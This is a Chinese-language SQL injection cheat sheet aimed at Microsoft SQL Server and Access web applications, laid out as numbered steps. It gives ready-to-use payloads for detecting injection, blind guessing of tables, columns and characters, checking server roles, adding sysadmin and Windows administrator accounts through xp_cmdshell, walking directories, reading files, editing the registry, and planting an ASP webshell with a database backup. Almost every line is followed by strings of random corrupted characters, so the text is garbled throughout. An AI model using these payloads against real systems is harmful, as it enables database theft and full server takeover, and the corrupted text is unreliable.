1.判断是否有注入;and 1=1 ;and 1=2 �n�;�wV�iw
2.初步判断是否是mssql ;and user>0 -F_c�Bu81V
,0{x-S0jX<
3.注入参数是字符'and [查询条件] and ''=' ��-kHJH><j
A?h��o<�@^
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ZsSW{ffZ77
)!~,xl^j{}
5.判断数据库系统 �9sI&���d�
FC
WF�$'cO
;and (select count(*) from sysobjects)>0 mssql 2��9�cx(�
?TJ4L/"(k6
;and (select count(*) from msysobjects)>0 access ��H�4W!Md�
��=J|jCK[r
�.5);W;`�X
#8zC/u\`�=
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �4U~'Oa�@p
X�,��bhX/h
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
�En)Ptz#0
>@Pw{Z�h$�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 A�N3oh1xe:
HJBGxy���w
9.(1)猜字段的ascii值(access) uQ|LkL%<�^
�U��z~��B`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 >�'4$g�7o,
(V1;`�sI8
(2)猜字段的ascii值(mssql) O(V�WJ@EHn
t2Jf+t_B7�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 h=\1ZQK�C)
}��ice*3'3
10.测试权限结构(mssql) :W6'G�@ p�
r+h%a~A#�>
<B>hvuCo�H
pU'${�Z~�b
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }z�xf~4��1
-v-kF��zu�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- d2�d8,�V�g
�`��w��Z�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #-PMR�Eg�O
�&iZt(XD��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��)B+R|PZ,
��Na@;�F{�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- :J_U�Xt�x�
DB�G0)=SHy
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- kvuR�T`�/�
� v\CBw��"
;and 1=(select IS_MEMBER('db_owner'));-- %hN�(�79:g
EZ:?
(|�h
:5$E�r��I�
�R�)ZzRz|/
11.添加mssql和系统的帐户 d�NY'�uv&Y
{�to(?��`Y
;exec master.dbo.sp_addlogin username;-- M$.�bC0}T
;exec master.dbo.sp_password null,username,password;-- ]*'�_��a@h
|vm��-(HY!
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �:3XvHL0rx
�H �C,5j)1
;exec master.dbo.xp_cmdshell 'net user username password �xf/�K��+
j`��q�>YPp
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- EpKZ.lC��U
Dt>�tTU� 6
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �A�,t�g268
3�� !8#w�n
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 1LSJy*�yY�
/4O�Qx0Xmm
�2O@�O��N/
Y:\]���d1C
12.(1)遍历目录 ezb�k@n��o
8{!|` �b'f
;create table dirs(paths varchar(100), id int) Q�I��U%!9Y
5+!y�XkE^e
;insert dirs exec master.dbo.xp_dirtree 'c:\' uL-�kihV:-
\)wVO�*9*0
;and (select top 1 paths from dirs)>0 `7y3C�\zyQ
d�}fd^��x/
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��EPL�Hw�
V`LE� 'E��
BeQ'\#q,��
sk<S`J,M/_
(2)遍历目录 W`�JI���/�
�X_�nb�Nql
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �h�$$JX�f
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U��MBeY[�?
-6uLw�w=w4
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 aM1WC 'c&)
�;`c:�Law4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �0PFC��%�x
�Z����L�0k
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 b�v(+$�YR�
��lu�l���
�## vP�(M$
~N;
dX[@BT
13.mssql中的存储过程 �J Q*~le*
p=eS���J*�
xp_regenumvalues 注册表根键, 子键 C�dC�Y#�$Z
e@vZ�g8Ie�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 %���rnRy<9
.Jg<H %%f
xp_regread 根键,子键,键值名 *�P7n� YjG
zA$ ��Y�@f
;exec xp_regread z=>��P�jIW
c�[X6!��_�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 yB���*aG�
5>�Ce��Fy
xp_regwrite 根键,子键, 值名, 值类型, 值 �s� nx��we
�hUp3$4w�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��f>mEX='w
2uY:p=DxG9
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ak3WE�R|f#
ZJ��G��Iib
xp_regdeletevalue 根键,子键,值名 H&F2[�j$T�
j!�Ys��/�D
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 @W(,|�xE�S
��~�e���,K
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 d/*EuJYin<
��0L"u�U�3
��OE�bZs-:
hZ�US#75M5
14.mssql的backup创建webshell >tL"�8@z9�
e*(
_�Cvxp
use model 2��y�8F�P#
rc%*g3ryLG
create table cmd(str image); Ssa��/�;O2
�M��_7�5bU
insert into cmd(str) values (''); F3�Vvq�t*2
DX3�jE p�2
backup database model to disk='c:\l.asp'; UQ^��
)t
]
SF�s��T^f<
{�"|GV�~�
��_�J"J�[$
15.mssql内置函数 �r`u��9MJ*
c�-�@�EHv
;and (select @@version)>0 获得Windows的版本号 ���Ai)Q(]�
�Pff-eT+~m
;and user_name()='dbo' 判断当前系统的连接用户是不是sa hiR+cPSF��
b_~��KtMO
;and (select user_name())>0 爆当前系统的连接用户 =��PL�y^%�
�g8"{smP/
;and (select db_name())>0 得到当前连接的数据库 }�ze�Kf/?'
F>@z&�a}�(
;%u)~3B$JK
[vdC�$9z,�
16.简洁的webshell ���Hp�p;dG
9x8��Ai���
use model !�$o�9:[�B
<�lPHeO<^]
create table cmd(str image); ��tj�m@+xs
�N �*n?h�N
insert into cmd(str) values (''); ��E@="n<uS
*q�I�ns/@�
backup database model to disk='g:\wwwtest\l.asp';
